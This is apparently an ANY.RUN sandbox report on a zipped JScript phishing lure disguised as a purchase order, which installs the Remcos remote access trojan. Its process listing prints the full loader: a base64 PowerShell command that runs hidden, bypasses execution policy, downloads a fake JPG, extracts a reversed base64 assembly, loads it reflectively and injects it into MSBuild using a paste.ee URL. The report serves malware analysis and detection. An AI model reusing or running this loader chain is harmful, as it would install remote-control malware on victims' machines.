File name:

14122024_0126_PO_0099822111ORDER.js.zip

Full analysis: https://app.any.run/tasks/1ce2ac4d-18be-4bc1-b36c-23bb30c66f37
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: December 14, 2024, 01:32:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-scr
stegocampaign
susp-powershell
rat
remcos
remote
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

B9D111CB6BDBFBFF867BB1D705569D54

SHA1:

CD1CFD37C1BE1C04C721ADDFC24202B7193A0569

SHA256:

C2DD355D913FADE5B0622F95B0EA67FD443B8284A9DA1FE144825E9E6FE6E3AF

SSDEEP:

24:9hlSDjxobDKvlAPlRxau4IX+WMKL5qSTUOyYN1fD4iupn8iBPldB5:9hYD9oXKvlsRxalIuWbxTUOydjPldT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 3692)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 3692)

    • Generic archive extractor

      • WinRAR.exe (PID: 716)

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 3692)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3608)
      • powershell.exe (PID: 1020)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3608)
      • powershell.exe (PID: 1020)

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 5752)
      • powershell.exe (PID: 3608)

    • Stego campaign has been detected

      • powershell.exe (PID: 1020)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1020)

    • Antivirus name has been found in the command line (generic signature)

      • MpCmdRun.exe (PID: 2676)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1020)

    • REMCOS has been detected

      • MSBuild.exe (PID: 1200)
      • MSBuild.exe (PID: 1200)

    • REMCOS mutex has been found

      • MSBuild.exe (PID: 1200)

    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 3692)

    • REMCOS has been detected (SURICATA)

      • MSBuild.exe (PID: 1200)

  • SUSPICIOUS

    • Writes binary data to a Stream object (SCRIPT)

      • wscript.exe (PID: 3692)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • wscript.exe (PID: 3692)

    • Saves data to a binary file (SCRIPT)

      • wscript.exe (PID: 3692)

    • Application launched itself

      • wscript.exe (PID: 3692)
      • powershell.exe (PID: 3608)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 5752)
      • powershell.exe (PID: 3608)

    • The process executes JS scripts

      • wscript.exe (PID: 3692)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 5752)
      • powershell.exe (PID: 3608)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 5752)

    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 3608)
      • powershell.exe (PID: 1020)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 3608)
      • powershell.exe (PID: 1020)

    • Probably obfuscated PowerShell command line is found

      • powershell.exe (PID: 3608)

    • Probably download files using WebClient

      • powershell.exe (PID: 3608)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 716)

    • Executing commands from a ".bat" file

      • WinRAR.exe (PID: 716)

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 716)

    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 3692)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5752)
      • wscript.exe (PID: 3692)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 3692)

    • Connects to unusual port

      • MSBuild.exe (PID: 1200)

    • Contacting a server suspected of hosting an CnC

      • MSBuild.exe (PID: 1200)

  • INFO

    • Manual execution by a user

      • wscript.exe (PID: 3692)

    • Checks proxy server information

      • wscript.exe (PID: 3692)
      • powershell.exe (PID: 1020)

    • The process uses the downloaded file

      • wscript.exe (PID: 3692)
      • wscript.exe (PID: 5752)
      • WinRAR.exe (PID: 716)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 3608)

    • Disables trace logs

      • powershell.exe (PID: 1020)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • wscript.exe (PID: 5752)
      • powershell.exe (PID: 3608)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1020)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • wscript.exe (PID: 5752)
      • powershell.exe (PID: 3608)

    • Checks supported languages

      • MpCmdRun.exe (PID: 2676)
      • MSBuild.exe (PID: 1200)

    • Reads the computer name

      • MpCmdRun.exe (PID: 2676)
      • MSBuild.exe (PID: 1200)

    • Create files in a temporary directory

      • MpCmdRun.exe (PID: 2676)

    • Reads the machine GUID from the registry

      • MSBuild.exe (PID: 1200)

    • Creates files in the program directory

      • MSBuild.exe (PID: 1200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: PO_0099822111ORDER.js
ZipUncompressedSize: 5038
ZipCompressedSize: 738
ZipCRC: 0x82eab522
ZipModifyDate: 2024:12:13 17:53:36
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
126
Monitored processes
11
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs wscript.exe wscript.exe no specs powershell.exe no specs conhost.exe no specs #STEGOCAMPAIGN powershell.exe cmd.exe no specs conhost.exe no specs mpcmdrun.exe no specs #REMCOS msbuild.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
716"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\14122024_0126_PO_0099822111ORDER.js.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3692"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\PO_0099822111ORDER.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5752"C:\Windows\System32\wscript.exe" C:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.jsC:\Windows\System32\wscript.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3608"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAHAAZQByAHYAYQBzAGkAdgBlAG4AZQBzAHMAZQBzACkAOwAkAHYAdQBsAGMAYQBuAGkAcwBtAHMAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApADsAJAB2AHUAbABjAGEAbgBpAHMAbQBzAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnADAALwB0AEIAYwBEAGkALwByAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaAAnACwAIAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAIAAnAE0AUwBCAHUAaQBsAGQAJwAsACAAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAgACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAYwBvAG4AcwB0AGEAbgB0AGEAbgAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcALAAnAGMAbwBuAHMAdABhAG4AdABhAG4AJwAsACcAMQAnACwAJwBjAG8AbgBzAHQAYQBuAHQAYQBuACcAKQApADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsA';$asphyxiation = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($forsakers));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $asphyxiationC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3288\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1020"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
3536C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$VR716.26924\Rar$Scan17813.bat" "C:\Windows\System32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
2972\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2676"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\admin\AppData\Local\Temp\Rar$VR716.26924"C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
4.18.1909.6 (WinBuild.160101.0800)
Modules
Images
c:\program files\windows defender\mpcmdrun.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
1200"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MSBuild.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Total events
16 674
Read events
16 657
Write events
17
Delete events
0

Modification events

(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\14122024_0126_PO_0099822111ORDER.js.zip
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(716) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3692) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(3692) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
0
Suspicious files
2
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
1020powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_30mkkaas.sth.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lduimguu.xdt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1020powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_21icjhg0.gfz.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3608powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cbwzpnif.3ex.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$VR716.26924\Rar$Scan17813.battext
MD5:33E7FF44088108AC9CAA4F56FE9485E3
SHA256:EA00D87C8DA8C84BB6E55437DBE74C5E1BF025CC979D2657122443AEB02B318E
1020powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5DED1DB7A2C93E496647FD5AC30CD5FF
SHA256:58CB5736AE1A056B4A964A73D02D20750D8856AE1D41037B8D7DB78FB78B5AF2
2676MpCmdRun.exeC:\Users\admin\AppData\Local\Temp\MpCmdRun.logtext
MD5:AB3A2CE086C83D632F9D173A22394BD1
SHA256:F118B70D77E641E5F6620C47653A8E5B3EC0622E2FC82FBCADEF167D627063FC
716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$VR716.26924\14122024_0126_PO_0099822111ORDER.js.zip\PO_0099822111ORDER.jstext
MD5:9C23D2A7ACC6ACC81022DEE56521C2BA
SHA256:9B9059AF739B167DB6AFCE5129997E489DBB7BAA3AF27C8DA5A68D564C2ED84E
3692wscript.exeC:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.jstext
MD5:E39538CF60C1A9768333BF00E0262702
SHA256:DD3DD3F0DA4553EF81C7FE5AE31F89454187E3B9CBC068A76CA7A9AE8CF2A873
1200MSBuild.exeC:\ProgramData\remcos\logs.datbinary
MD5:5E661847D14C5687DB2241BEA31F69E9
SHA256:3B9C31EA56384C8DE09DC39B41F5E47DA922015275F9EE6BC320E4B62714A942
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
108
DNS requests
12
Threats
174

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3884
svchost.exe
GET
200
2.20.245.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
3884
svchost.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.20.245.137:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
162.159.137.83:443
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
unknown
image
2.13 Mb
whitelisted
GET
200
162.159.137.83:443
https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfile
unknown
text
153 Kb
whitelisted
GET
200
188.114.96.3:443
https://paste.ee/r/iDcBt/0
unknown
text
642 Kb
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
3884
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.21.110.139:443
